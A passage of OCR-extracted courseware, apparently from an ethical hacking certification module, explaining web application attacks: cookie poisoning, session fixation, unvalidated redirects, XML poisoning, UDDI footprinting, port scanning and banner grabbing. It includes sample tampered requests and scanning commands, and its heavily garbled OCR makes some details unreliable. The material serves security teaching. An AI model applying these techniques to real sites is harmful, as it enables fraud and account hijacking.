85 How Cookie Poisoning Works GET /store/buy.aspx?checkout=yes HTTP/1.0 H ost Accept /* Referrer: SESSIONID=325896ASDD23SA3587; BasketSize=3; lteml=1258;. Item2=2658; Item3=6652; TotalPrice=11568; W eb server replies w ith requested page and sets a cookie on the user's browser User browses a w eb page A ttacker steals cookie (Sniffing, XSS, phishing attack) GET /stor^buy.aspx?checkout*yes HTTP/1.0 Host Accept: / Referrer: Cookie: SESSIONID*325896ASDD23SA3587; BasketSlze»3; lteml»1258; Item2=2658; Item3«6652; TotalPrice*100; Attacker orders for product using m odified cookie Product is delivered to attacker's address A t t a c k e r Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. H o w C o o k i e P o i s o n i n g W o r k s Cookies are m ainly used by w eb applications to simulate a stateful experience depending upon the end user. They are used as an identity fo r the server side of web application com ponents. This attack alters the value of a cookie at the client side p rio r to the request to the server. A w eb server can send a set cookie w ith the help of any response over the provided string and com m and. The cookies are stored on the user com puters and are a standard way of recognizing users. All the requests of the cookies have been sent to the web server once it has been set. To provide fu rth e r fu n ctio n a lity to the application, cookies can be m odified and analyzed by JavaScript. w In this attack, the attacker sniffs the user's cookies and then m odifies the cookie param eters and subm its to the w eb server. The server then accepts the attacker's request and processes it. M odule 13 Page 1807

86 The follow ing diagram clearly explains the process of a cookie poisoning attack: ך GET /store/buy.*1spx?checkout-yeshi IP/1.0 Host: Accept: */* Referrer: SESSIONID-32b896A$DD23SA3587; BasketSize-3;lteml-1258; ltem2-2658; ltem3-6652; TotalPrice-11568; A W e b s e rv e r re p lie s w ith re q u e s te d page and sets a cookie on the user's brow se r Webserver User brow ses a w eb page A tta c k e r steals c o o k ie (S n iffin g, XSS, phishing attack) GET /store/buy.aspx?checkout=yes HTTP/1.0 Host: Accept: */* Referrer: Cookie: SESSIONID ASDD23SA3587; BasketSize=3; lteml-1258; Item2=2658; ; Item36652 TotalPrice-100; Attacker orders fo r p roduct using m o d ifie d cookie P roduct is delivered to attacker's address Attacker F IG U R E : H o w C o o k ie P o is o n in g W o r k s M odule 13 Page 1808

87 S e s s i o n F i x a t i o n A t t a c k CEH In a s e s s io n fix a t io n a tta c k, th e a tta c k e r tric k s t h e u s e r t o access a g e n u in e w e b s e rv e r u s in g a n e x p lic it s e s s io n ID v a lu e A tta c k e r a s s u m e s th e id e n t it y o f th e v ic t im a n d e x p lo its h is c r e d e n tia ls a t th e s e rv e r A tta cker logs on to th e bank w e b site using his credentia ls Web server sets a session ID on the attacker's machine S e rv e r (juggybank.com ) A tta c k e r A tta cker logs in to th e server using th e victim 's credentials w ith the same session ID 1 g o A A Attacker sends an containing a link with a fix session ID h ttp : / / juggybank.dom/login.ja p?sessionid=4321 It User clicks on th e lin k and is re d ire cte d to th e bank w e b site User logs into the server using his credentials and fixed session ID U s e r Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. S e s s i o n F i x a t i o n A t t a c k s Session fixation helps an attacker to hijack a valid user session. In this attack, the attacker authenticates him or herself w ith a know n session ID and then lures the victim to use the same session ID. If the victim uses the session ID sent by the attacker, the attacker hijacks the user validated session w ith the knowledge of the used session ID. The session fixation attack procedure is explained w ith the help of the follow ing diagram: A tta cker logs on to th e bank w e b s ite using his credentia ls W ebserver sets a session ID on the attacker's machine Attacker A tta c k e r logs in to th e server using th e victim 's credentials w ith the same session ID D OB S e rv e r (juggybank.com ) Attacker sends an em ail containing a link with a fix session ID h ttp : //juggybank.dom /login. js p?sessionid=4321 User clicks on the link and is redirected to the bank w ebsite User logs in to the server using his credentials and fixed session ID User FIGURE 13.26: How Cookie Poisoning W orks M odule 13 Page 1809

88 I n s u f f i c i e n t T r a n s p o r t L a y e r P r o t e c t i o n CEH In s u ffic ie n t tr a n s p o r t la y e r p ro te c tio n s u p p o rts w e a k a lg o rith m s, a n d uses e x p ire d o r in v a lid c e r tific a te s U n d e rp riv ile g e d SSL s e tu p can a ls o h e lp th e attacker to launch phishing and M IT M attacks T h is v u ln e ra b ility e xp o se s u s e r's d ata to u n tr u s te d t h ir d p a rtie s and can lead to account th e ft Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited I n s u f f i c i e n t T r a n s p o r t L a y e r P r o t e c t i o n SSL/TLS authentication should be used fo r authentication on the websites or the attacker can m o n ito r netw ork traffic to steal an authenticated user's session cookie. Insufficient transport layer protection may allow u ntrusted th ird parties to obtain unauthorized access to sensitive inform ation. The com m unication betw een the w ebsite and the client should be properly encrypted or data can be intercepted, injected, or redirected. Various threats like account thefts, phishing attacks, and adm in accounts may happen after systems are being com prom ised. M odule 13 Page 1810

89 Im proper Error Handling CEH J I m p r o p e r e r r o r h a n d li n g g iv e s in s ig h t i n t o s o u r c e c o d e s u c h a s lo g ic f la w s, d e f a u l t a c c o u n t s, e tc. U s in g t h e in f o r m a t i o n r e c e iv e d f r o m a n e r r o r m e s s a g e, a n a t t a c k e r i d e n t if ie s v u l n e r a b il it ie s I n f o r m a t i o n G a t h e r e d e O u t o f m e m o ry «N u ll p o in te r e x c e p tio n s «S ystem call fa ilu re D ata b ase u n a v a ila b le N e tw o rk tim e o u t S D ata b ase in fo rm a tio n a W eb a p p lic a tio n lo g ic a l f lo w A p p lic a tio n e n v iro n m e n t l o o httpy/j uggyboy.com/ Boy.1 General Error Could not obtain post/user Information DEBUGMODE SQLErroc: 1016 Can't open file: 'nuke_bbposts_text.myo'. (errno: 145) SELECTu.username, u.userjd, u.user_posts, u.user_from, u.user_webs!te. u.user_ , u.user_msnm, u. user_vi ewe mail, u.user_rank, u.user_sig, u.user_sig_bbcode_uid, u.user_alowsmile, p.*, pt.post_text, ptpost_subject pt.bbcode.uid FROMnuke_bbposts p, nuke_usersu, nuke_bbposts_text pt WHERE p.topicjd»1547 ' ANDpt.postJd p.postjd ANDu.userjd =p.posterjd ORDERBY p.post.tlme ASCLI MIT0, IS Line: 43S File:/user/home/geeks/www/vonage/module s/forums/vi ewtope.php Copyright by E&Cauacfl. All Rights Reserved. Reproduction is Strictly Prohibited. J J w S i I m p r o p e r E r r o r H a n d l i n g e l Im proper error handling may result in various types of issues fo r a w ebsite exclusively related to security aspects, especially when internal error messages such as stack traces, database dumps, and error codes are displayed to the attacker. An attacker can get various details related to the netw ork version, etc. Im pro pe r e rror handling gives insight into source code such as logic flaws, default accounts, etc. Using the inform ation received from an error message, an attacker identifies vu lnerabilities fo r launching attacks. Im proper error handling may allow an attacker to gather inform ation such as: Out of m em ory e e e Null p ointer exceptions System call failure Database unavailable 0 N etw ork tim e o u t Q e e Database inform ation W eb application logical flo w Application environm ent M odule 13 Page 1811

90 I n s e c u r e C r y p t o g r a p h i c S t o r a g e C E H Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited.!. j! I n s e c u r e C r y p t o g r a p h i c S t o r a g e W eb applications use cryptographic algorithm s to encrypt th e ir data and other sensitive inform ation th a t is transferred from server to client or vice versa. The w eb application uses cryptographic code to encrypt the data. Insecure cryptographic storage refers to w hen an application uses poorly w ritte n encryption code to securely encrypt and store sensitive data in the database. The insecure cryptographic storage m entions the state of an application w here poor encryption code is used fo r securely storing data in the database. So the insecure data can be easily hacked and m odified by the attacker to gain confidential and sensitive in fo rm a tio n such as credit card inform ation, passwords, SSNs, and o the r authentication credentials w ith appropriate encryption or hashing to launch identity th eft, credit card fraud, or o the r crimes. Developers can avoid such attacks by using proper algorithm s to encrypt the sensitive data. The follow ing pictorial representation shows the vulnerable code th a t is poorly encrypted and secure code th at is properly encrypted using a secure cryptographic algorithm. M odule 13 Page 1812

91 F IG U R E : I n s e c u r e C r y p t o g r a p h ic S to r a g e M odule 13 Page 1813

92 B r o k e n A u t h e n t i c a t i o n a n d S e s s i o n M a n a g e m e n t CEH B A n a t ta c k e r u s e s v u ln e r a b ilit ie s in t h e a u t h e n t ic a t io n o r s e s s io n m a n a g e m e n t f u n c t io n s s u c h as e x p o s e d a c c o u n ts, s e s s io n ID s, lo g o u t, p a s s w o r d m a n a g e m e n t, t im e o u t s, r e m e m b e r m e, s e c r e t q u e s tio n, a c c o u n t u p d a te, a n d o t h e r s t o im p e r s o n a te u s e rs Session ID in URLs le/saleitems=30 4;jsessionid120 MTOIDPXMOOQSABGCK LHCJUN2JV?dest NewMexico A tta cker sniffs th e n e tw o rk tra ffic o r tricks th e user to get the session IDs, and reuses th e session IDs for m alicious purposes Password Exploitation A tta cker gains access to th e w e b application's passw ord database. If user passwords are not encryp te d, th e a ttacke r can exploit every users' password Timeout Exploitation If an application's tim e o u ts are n o t set p ro p e rly and a user sim ply closes the bro w se r w ith o u t logging o u t fro m sites accessed thro u g h a public com puter, th e a tta cke r can use th e same bro w se r later and exploit the user's privileges Copyright by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited. B r o k e n A u t h e n t i c a t i o n a n d S e s s i o n M a n a g e m e n t Authentication and session m anagem ent includes every aspect of user authentication and managing active sessions. Yet tim es solid authentications also fail due to w ea k credential functions like password change, fo rg ot my password, rem em ber my password, account update, etc. U tm ost care has to be taken related to user authentication. It is always b etter to use strong a uth e n tica tio n m ethods through special softw are- and hardware-based cryptographic tokens or biom etrics. An attacker uses vulnerabilities in the authentication or session m anagem ent functions such as exposed accounts, session IDs, logout, password m anagem ent, tim eouts, rem em ber me, secret question, account update, and others to im personate users. S e s s i o n I D i n U R L s 1, An attacker sniffs the n etw o rk traffic or tricks the user to get the session IDs, and reuses the session IDs fo r malicious purposes. Example: est=newm exico M odule 13 Page 1814

93 T i m e o u t E x p l o i t a t i o n If an application's tim eouts are not set properly and a user sim ply closes the browser w ith o u t logging o ut fro m sites accessed through a public com puter, the attacker can use the same browser later and e xploit the user's privileges. g jjg n P a s s w o r d E x p l o i t a t i o n An attacker gains access to the w eb application's password database. passwords are not encrypted, the attacker can exploit every users' password. If user M odule 13 Page 1815

94 U n v a l i d a t e d R e d i r e c t s a n d F o r w a r d s CEH Urt1fw4 ilhiul lutbm J U n v a lid a t e d r e d ir e c t s e n a b le a t t a c k e r s t o in s t a l l m a lw a r e o r t r i c k v ic t im s i n t o d is c lo s in g p a s s w o r d s o r o t h e r s e n s itiv e in f o r m a t i o n, w h e r e a s u n s a f e f o r w a r d s m a y a l lo w a c c e s s c o n t r o l b y p a s s Unvalidated Redirect Attacker sends an em ail containing rew rite link to m alicious server ( = U s e r User is redirected to attacker's server M a lic io u s S e rv e r A tta c k e r Attacker requests page from server w ith a forward ase.jsp?fwd=admin.jsp.-*--- - *- Unvalidated Forward ^ י B6 S e rv e r Attacker is forw arded to admin page lo o hnpj /www,ju C*ykhopxom/*dm1r^p Adm inistration Page I t Create price list Q Create item listing *1 Purchase records 3 Registered users Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited ^ U n v a l i d a t e d R e d i r e c t s a n d F o r w a r d s An attacker links to unvalidated redirects and lures the victim to click on it. W hen the ע victim clicks on the link thinking th a t it is a valid site, it redirects the victim to another site. Such redirects lead to installation o f m alw are and even may trick victim s into disclosing passwords or other sensitive inform ation. An attacker targets unsafe forw arding to bypass security checks. Unsafe forw ards may allow access control bypass leading to: Q Session Fixation Attacks 0 Security M anagem ent Exploits Failure to Restrict URL Access 0 M alicious File Execution M odule 13 Page 1816

95 U n v a l i d a t e d R e d i r e c t Attacker Attacker sends an containing re w rite link to malicious server ( ) User User is redirected to attacker's server U n v a l i d a t e d F o r w a r d Administration Page A tta cker requests page from server w ith a forw ard h ttp ://w w w.juggyshop.com/purch ase.jsp?fwd=admin.jsp A tta cker is forw arded to adm in page Create price list Q Create item listing *1 Purchase records Attacker Server 3 Registered users F IG U R E : U n v a lid a t e d R e d ir e c ts a n d F o r w a r d s M odule 13 Page 1817

96 Web Services Architecture CEH C«rt1fW4 itfciul NmIm XML, SOAP, WSDL, Schema, WS-Advertising, etc..n et TCP Channel, Fast InfoSet, etc. Copyright by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited. * T O W e b S e r v i c e s A r c h i t e c t u r e WS W ork Processes WS S ecurity WS Policy WS Security Policy W S-Federation XML Encryption WS-Trust W S-SecureConversion SAML Kerberos X.509 Security Token Profiles :1 XML D igital Signatures XML, SOAP, WSDL, Schema, W S-Advertising, etc. HTTP j.net TCP Channel, Fast InfoSet, etc. FIGURE 13.29: W eb Services A rchitectu re M odule 13 Page 1818

97 Web Services Attack CEH UrlifM IUmjI NMhM 0 Web services evolution and its increasing use in business offers new attack vectors in an application framework Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) forthe description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web 0 Copyright by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited. ^ e b S e r v i c e s A t t a c k 1 ^ 4 ^ W eb services evolution and its increasing use in business offers new attack vectors in an application fram ew ork. W eb services are process-to-process com m unications th a t have special security issues and needs. W eb services are based on XML protocols such as W eb Services Definition Language (WSDL) fo r describing the connection points; Universal Description, Discovery, and Integration (UDDI) fo r the description and discovery o f w eb services; and Simple Object Access Protocol (SOAP) fo r co m m un icatio n betw een w eb services th a t are vulnerable to various w eb application threats. Similar to the way a user interacts w ith a w eb application through a browser, a w eb service can interact directly w ith the w eb application w ith o u t the need fo r an interactive user session or a browser. These w eb services have detailed definitions th a t allow regular users and attackers to understand the construction of the service. In this way, much of the inform ation required to fin ge rp rin t the e nvironm ent and fo rm u la te an attack is provided to the attacker. It is estim ated th a t w eb services reintroduce 70% o f the vulnerabilities on the web. Some examples o f this type of attack are: Q An attacker injects a malicious script into a w eb service, and is able to disclose and m odify application data. An attacker is using a w eb service fo r ordering products, and injects a script to reset quantity and status on the co n firm a tio n page to less than w ha t was originally ordered. M odule 13 Page 1819

98 In this way, the system processing the order request subm its the order, ships the order, and then m odifies the order to show th a t a smaller num ber of products are being shipped. The attacker winds up receiving m ore of the product than he or she pays for. M odule 13 Page 1820

99 W e b S e r v i c e s F o o t p r i n t i n g A t t a c k C E H C«rt1fW4 itfciul NmIm J A t t a c k e r s f o o t p r i n t a w e b a p p lic a t i o n t o g e t U D D I i n f o r m a t i o n s u c h a s b u s in e s s E n t it y, b u s in e s S e r v ic e, b i n d in g T e m p la t e, a n d t M o d e l X M L Q u e r y X M L R e s p o n s e POST /inquire HTTP/1.1 Content Type: text/xml; charset=utf-8 SOAPAction: Cache-Control: no-cache Pragma: no-cache User-Agent: Java/1.4.2_04 Host: uddi.miaosoft.com Accept: text/html,image/gif, image/jpeg/; q=.2, /; q=.2 Connection: keep-alive Content-Length:229 <?xml version1.0 " " encoding "UTF-8"?> < Envelop xmlns=" <Body> <fmd_business generic="2.0" maxrows"50" xmlns="urn"uddiorg:api_v2"xname>amazon</name></find_business> </Body> </Envelop> HTTP/ Continue 1.1 HTTP 200 OK Date: Tue. 28 Sep :07:42 GMT Mk*osoft-llS6.0 Server: X-Powered-By: ASP.NET XAspNet-Vers-oo Cache-CortroJ: private, max-age=0 Contort Type: text/xml: cbarsot-utf 8 Contert Length: 1272 <?xml versk)n=*l.0 encoding= utl-8,'?><80ap:env0l0p0 xmlnssoap-'bttp schemas / xmlsoap org/soap/onvolopor xmlns:xsi-^ttp:// XMLSchoma instance' xm1n8:xsd *hnp:/ / generic-^.o" operator-*microsoft Corporation truncated-"false" servicelnfos><servicelnfo >< urn:uddi-org:apl_v2, - xmlns se vicekey=*6ec464eo-218d-4dafb4dd >dd4ba9dc8l3 ' businesskey=*9l4374tbm b8efc9c34c8a0ce5*><namo xml lang-*on-us"> <>namo></sorvicolnk»<sorvicolnlo sorvcokoy-m b c89cc31250cc businosskoy-"bfb9dc23adoc-4173bd5f 5545abacaalb"xnamc xml:lang-"en-us"> </namc></scrviceln10xscfvicelnlo serv!cekey«ba6d9d56-ea3m263-a95a-eebl 7e59l Odb" businesskey="18b71de2-dl 5c-437c cbec82l6d0f5 xname xml:lang=*en"> </namcx/servicelnloxservicelnlo " coc-8dba-c5e4e268le12 bc82a008-5e4e4 «servicekey - e-448a-b759 busines8key» Cbb44a049t21 xname xml:lang="on*> namo></scrvicclnfo><scfvicclnfo -> " ce cod* servicekey-,8faa80ea-42dd4 businesskey-"ee41518b-bf99-4a66-9e9ec33c4c43db5a*xname xh1l:lang«*en'> </name></serviceln10><7serviceln10s></servicelist><;soap:body><.'soap: Copyright by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited. ^ W e b S e r v i c e s F o o t p r i n t i n g A t t a c k ^ ^ Attackers use Universal Business Registry (UBR) as m ajor source to gather inform ation of w eb services. It is very useful fo r both businesses and individuals. It is a public registry that runs on UDDI specifications and SOAP. It is som ew hat similar to a "W hois server" in functionality. To register w eb services on UDDI server, business or organizations usually use one of the follow ing structures: Q Q Business Entity Business Service Binding Tem ple e Technical M odel (tm odel) Hence, attackers fo o tp rin t a w eb application to get UDDI inform ation such as businessentity, businesservice, bindingtem plate, and tm od el. M odule 13 Page 1821

100 X M L Q u e r y X M L R e s p o n s e POST/inquire HTTP/1.1 Content-Type: text/xml; charset=utf-8 " SOAPAction: Cache-Control: no-cache Pragma: no-cache User-Agent: Java/1.4.2_04 Host: uddi.microsoft.com Accept: text/html, image/glf, image/jpeg,*; q=.2, /; q=.2 Connection: keep-alive Content Length:229 <?xml version="1.0" encoding="utf-8"?> <Envelop xmlns=" <Body> <find_businessgeneric="2.0" maxrows"50" xmlns="urn"uddi- 0rg:api_v2"xname>amaz0n</namex/find_business> </Body> </Envelop> HTTP/1.1 SO Continue 0 HTTP? OK Date: Tue, 28 Sep :07:42 GMT Server: Microsotl-IIS'6.0 X-Powered-By: ASP NET X-AspNet Version: Cache-Control: וזז, private ax-age-0 Content-Type: text/xml: cnarset-ut(8 Content-Length: 1272 <?!tml " - version1.0 encoding="utf-8"?><soap:envelope nttp://schemas.xmlsoaporg/soap/enveloper xmlns:soap xmlns:*si " xmlns:xsd http^amww.w3.org/2001/xmlschema"><soap:bodyxservicelist generic^ "2.0" operator "Microsoft Corporation" truncated "false'' xservicelnfosxserviceln1o um:uddi-0rg:api_v2 " xmlns ec464eo-2f8d-4dal-b4dd-5dd4ba9dc8f3 servjcekey=6 - fb-(10f-4634-b8el businesskey C9e34e8a0ee5'xname xml:lang='en-us"> </namex/servicelr1to><serv1celnto servicekey= b33-40f c89cc3125eoc businesskey= bfb9dc23-adec-4(73-bd5f- 5545abaeaa1b ><name xml:lang="en-us"> </name><feerviceln10><serviceln10 - d15c-437c8877 businesskey-'t8b7lde2 setvicekey»t>a6d9d56-ea3f-4263-a95a-eeb Odb ebec8216d015"xname xml:lang='en"> </namex/serv1celnt0xservicelnk> sen cekey-"bc82ao38-5e4e1' c0c-8dba-c5e4e268fe 12" businesskey-" e-448a-b759- ebb44a049f21"xname xml:lang="en"> </namex/serv1celnf0xservcelnf0 servicekey-"8faa80ea-42dd-4c0d ce "businesskey-'ee41518b-b(99-4a66-9e9ec33c4c43db5a"xname < en. a51lang * </name></servicelnfox/servicelnlos></serviceust></soap:body><'soap: ^pveiopo F IG U R E : W e b S e rv ic e s F o o t p r in t in g A t t a c k M odule 13 Page 1822 Ethical Hacking and C ounterm easures Copyright by EC-C0l1nCil

101 W e b S e r v i c e s X M L P o i s o n i n g CEH Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information XM L R equest <CustomerRecord> <CustomerNumber>2010</Custom ernum ber> <FirstName>Jason</FirstName> <LastName>Springfield</LastName> <Address>Apt 20, 3rd Street</Address> < >jason@ springfield.com</ > <PhoneNumber> </PhoneNumber> </CustomerRecord> <CustomerRecord> Poisoned XM L R equest <CustomerNumber>2010</Custom ernum ber> <FirstName>Jason</FirstName><CustomerNumber> 2010</CustomerNum ber> <FirstName>Jason</FirstName> <LastName>Springfield</LastName> <Address>Apt 20, 3rd Street</Address> < >jason ( springfield.com</ > <PhoneNumber> </PhoneNumber> </CustomerRecord> Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. W e b S e r v i c e s X M L P o i s o n i n g XML poisoning is similar to a SQL injection attack. It has a larger success rate in a web services fra m e w o rk. As w eb services are invoked using XML docum ents, the traffic th at goes betw een server and browser applications can be poisoned. Attackers create malicious XML docum ents to alter parsing mechanisms like SAX and DOM th a t are used on the server. Attackers insert malicious XML codes in SOAP requests to perform XML node m anipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic. Attackers can m anipulate XML external e n tity references th at can lead to arbitrary file or TCP connection openings and can be exploited fo r o the r w eb service attacks. XML poisoning enables attackers to cause a denial-of-service attack and com prom ise confidential inform ation. M odule 13 Page 1823

102 F IG U R E : W e b S e rv ic e s X M L P o is o n in g M odule 13 Page 1824

103 Hacking M ethodology m m W eb A pplication Hacking Tools Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. ^ M o d u l e F l o w So far, we have discussed w eb application com ponents and various threats associated w ith w eb applications. Now we will discuss w eb application hacking m eth od o lo gy. A hacking m ethodology is a w ay to check every possible way to com prom ise the w eb application by a tte m p ting to exploit all potential vulnerabilities present in it. ^ W eb App Pen Testing W eb App Concepts Security Tools W eb App Threats C ounterm easures ^ Hacking M e th o d o lo g y 1S1 W eb A pplication Hacking Tools This section gives a detailed explanation of w eb application hacking m ethodology. M odule 13 Page 1825

104 # n ^ <n> ס W e b A p p H a c k i n g M e t h o d o l o g y In order to hack a w eb application, the attacker initially tries to gather as much inform ation as possible about the w eb infrastructure. Footprinting is one m ethod using which an attacker can gather valuable inform ation about the w eb infra structu re or w eb application. M odule 13 Page 1826

105 Footprint Web Infrastructure CEH J W e b i n f r a s t r u c t u r e f o o t p r i n t i n g i s t h e f i r s t s t e p in w e b a p p lic a t i o n h a c k in g ; i t h e lp s a t t a c k e r s t o s e le c t v ic t im s a n d i d e n t i f y v u l n e r a b le w e b a p p lic a t i o n s Server Discovery D is c o v e r th e p h y s ic a l s e rv e rs t h a t h o s ts w e b a p p lic a tio n Service Discovery D is c o v e r th e s e rv ic e s ru n n in g o n w e b s e rv e rs t h a t can b e e x p lo ite d as a tta c k p a th s fo r w e b a p p h a c k in g Server Identification G ra b s e rv e r b a n n e rs to id e n t if y th e m a k e and v e r s io n o f th e w e b s e rv e r s o ftw a r e Hidden Content Discovery E x tra c t c o n te n t a n d f u n c tio n a lit y t h a t is n o t d ir e c t ly lin k e d o r re a c h a b le fro m th e m a in v is ib le c o n te n t Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. F o o t p r i n t W e b I n f r a s t r u c t u r e W eb infrastructure fo otprin tin g is the first step in web application hacking; it helps attackers to select victims and id e n tify vulnerable w eb applications. Through web infrastructure footprinting, an attacker can perform : י S e r v e r D i s c o v e r y In server discovery, w hen there is an a tte m p ting to connect to a server, the redirector makes an incorrect assum ption th at the root o f the URL namespace will be W ebdavaware. It discovers the physical servers th a t host w eb application. S e r v i c e D i s c o v e r y Discovers the services running on w eb servers th a t can be exploited as attack paths fo r w eb app hacking. The service discovery searches a targeted application e nvironm ent fo r loads and services autom atically. S e r v e r I d e n t i f i c a t i o n Grab the server banners to id e n tify the make and version o f the w eb server software. It consists of: Q Local Identity: This specifies the server Origin-Realm and Origin-Host. M odule 13 Page 1827

106 e Q W f ^י Local Addresses: These specify the local IP addresses of the server th a t uses for Diam eter Capability Exchange messages (CER/CEA messages). Self-Names: This field specifies realm s to be considered as a local to the server, it means th a t any requests sent fo r these realms will be treated as if there is no realm in the specified request send by the server. H i d d e n C o n t e n t D i s c o v e r y Extract content and functionality th a t is not directly linked or reachable from the main visible content. M odule 13 Page 1828

107 F o o t p r i n t W e b I n f r a s t r u c t u r e : S e r v e r D i s c o v e r y S e r v e r d i s c o v e r y g iv e s i n f o r m a t i o n a b o u t t h e l o c a t i o n o f s e r v e r s a n d e n s u r e s t h a t t h e t a r g e t s e r v e r is a l i v e o n I n t e r n e t W h o is lo o k u p u tility gives in fo rm a tio n a b o u t th e IP addre ss o f w e b se rv e r and DNS nam es W h o is L o o k u p Tools: e h ttp ://w w w.ta m o s.co m e h ttp ://w w w.w h o is.n e t s h ttp ://n e tc ra ft.c o m G h ttp ://w w w.d n sstu ff.com DNS In te rro g a tio n provid es in fo rm a tio n a b o u t th e lo c a tio n a n d ty p e o f servers DNS Interrogation Tools: 9 h ttp://w w w.d nsstu ff.com «h ttp ://n e tw o rk-to o ls.co m 8 h ttp ://e -d n s.o rg» aintools.com Port Scanning a tte m p ts to connect to a p a rticular set o f TCP o r UDP p o rts to find o u t the service that exists on the server Port Scanning Tools: 1 9 Nm ap 0 W hatsu p PortScannerTool 8 NetScan Tools Pro 6 Hping Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited F o o t p r i n t W e b I n f r a s t r u c t u r e : S e r v e r D i s c o v e r y In order to fo o tp rin t a w eb infrastructure, first you need to discover the active servers on the internet. Server discovery gives inform ation about the location of active servers on the Internet. The three techniques, nam ely whois lookup, DNS interrogation, and port scanning, help in discovering the active servers and th e ir associated inform ation. W h o i s L o o k u p f 3): W hois Lookup is a tool th a t allows you to gather inform ation about a dom ain w ith the help of DNS and WHOIS queries. This produces the result in the fo rm of a HTML report. It is a utility th at gives inform ation about the IP address o f the w eb server and DNS names. Some o f the W hois Lookup Tools are: e e e 0 o h ttp ://w w w.ta m o s.co m h ttp ://n e tcra ft.co m h ttp ://w w w.w h o is.n e t h ttp ://w w w.d n sstu ff.co m D N S I n t e r r o g a t i o n DNS interrogation is a distributed database th a t is used by varied organizations to M odule 13 Page 1829

108 connect th eir IP addresses w ith the respective hostnam es and vice versa. W hen the DNS is im properly connected, then it is very easy to exploit it and gather required inform ation for launching the attack on the target organization. This also provides inform ation about the location and type of servers. Some o f the tools are: h ttp ://w w w.d n sstu ff.co m h ttp ://n e tw o rk-to o ls.co m h ttp://e-dns.org h ttp ://w w w.d o m a in to o ls.co m m m P o r t S c a n n i n g B U I Port scanning is a process of scanning the system ports to recognize the open doors. If any unused open port is recognized by an attacker, then he or she can intru de into the system by exploiting it. This m ethod attem pts to connect to a particular set of TCP or UDP ports to find out the service th at exists on the server. Some o f the tools are: Nmap NetScan Tools Pro W hatsup Portscanner Tool Hping M odule 13 Page 1830

109 F o o t p r i n t W e b I n f r a s t r u c t u r e : S e r v i c e D i s c o v e r y Copyright by HrCounctl. All Rights Reserved. Reproduction is Strictly Prohibited. F o o t p r i n t W e b I n f r a s t r u c t u r e : S e r v i c e D i s c o v e r y Service discovery finds the services running on w eb servers th a t can be exploited as attack paths fo r w eb application hacking. Service discovery searches a targeted application environm ent fo r loads and services autom atically. The targeted server has to be scanned thoroughly so th a t com m on ports used by w eb servers fo r d ifferent services can be identified. The table th a t follow s shows the list of com m on ports used by w eb servers and the respective HTTP services: Port Typical HTTP Services 80 W orld W ide W eb standard port 81 Alternate W W W 88 Kerberos 443 SSL (https) 900 IBM W ebsphere adm inistration client C o m p a q In s ig h t M a n a g e r M odule 13 Page 1831

110 2381 Compaq Insight M anager over SSL 4242 M icrosoft Application Center Remote m anagem ent 7001 BEA W eblogic 7002 BEA W eblogic over SSL 7070 Sun Java W eb Server over SSL 8000 Alternate W eb server, or W eb cache 8001 Alternate W eb server or m anagem ent 8005 Apache Tom cat 9090 Sun Java W eb Server adm in m odule Netscape A dm inistrator interface T A B L E : S e r v ic e D is c o v e r y You can discover the services w ith the help of tools such as Nmap, NetScan Tools Pro, and Sandcat Browser. Source: h ttp ://n m a p.o rg Nmap is a scanner th a t is used to find inform ation about systems and services on a n etw o rk and to construct a map of the netw ork. It can also define d ifferent services running on the w eb server and give detailed inform ation about the rem ote com puters. Scan Tools Profile Help Zenmap L=±hJ Target: google.com Scan Cancel Command: nmap T4 -A -v -PE -PS PA google.com Nmap Output Ports/Host! Topology Host Details Scans j OS < Host.9 google.com (74.12 C Filter Hosts < Port * Protocol * State < Service * Version # SO tcp open http # 113 tcp closed ident A 443 tcp open https F IG U R E : Z e n m a p T o o l s c r e e n s h o t M odule 13 Page 1832

111 F o o t p r i n t W e b I n f r a s t r u c t u r e : S e r v e r I d e n t i f i c a t i o n / B a n n e r G r a b b i n g CEH Urt1fw4 ilhiul lutbm A n a ly z e t h e s e r v e r r e s p o n s e h e a d e r f ie l d t o i d e n t if y t h e m a k e, m o d e l, a n d v e r s io n o f t h e w e b s e r v e r s o f t w a r e T h is in fo r m a tio n h e lp s a tta c k e rs t o s e le c t th e e x p lo its fro m v u ln e r a b ilit y d a ta b a s e s to a tta c k a w e b s e rv e r a n d a p p lic a tio n s C:\ t e l n e t 80 HEAD / HTTP/1.0 HTTP/ OK Server id e n tifie d ate?rihu!c095jj! idss5! Content-Lfrgth: 1270 as M icro so ft IIS Content-Type: text/mml sjt-cookl»t *Cp5cis:CNID««TC0e0-PBLPKEK0N0<:K0FFIP0CHPLNEi Via: 1.1 Application aid Content Networking Systen Sof tvware Connect io n! C lose nneetion to ho«t lost. B a n n e r g r a b b i n g t o o l s : H 1. Telnet 2. N e tca t 3. ID S e rv e 4. N e tc r a ft Copyright by E&Cauicfl. All Rights Reserved. Reproduction is Strictly Prohibited., F o o t p r i n t W e b I n f r a s t r u c t u r e : S e r v e r I d e n t i f i c a t i o n / B a n n e r G r a b b i n g Through banner grabbing, an attacker identifies brand a n d /o r version of a server, an operating system, or an application. Attackers analyze the server response header field to identify the make, m odel, and version of the w eb server softw are. This inform ation helps attackers to select the exploits fro m vulnerability databases to attack a w eb server and applications. C : \ t e l n e t w w w.juggyboy.com 80 HEAD / HTTP/1.0 A banner can be grabbed w ith the help o f tools such as: Telnet Q e Netcat ID Serve Netcraft These tools make banner 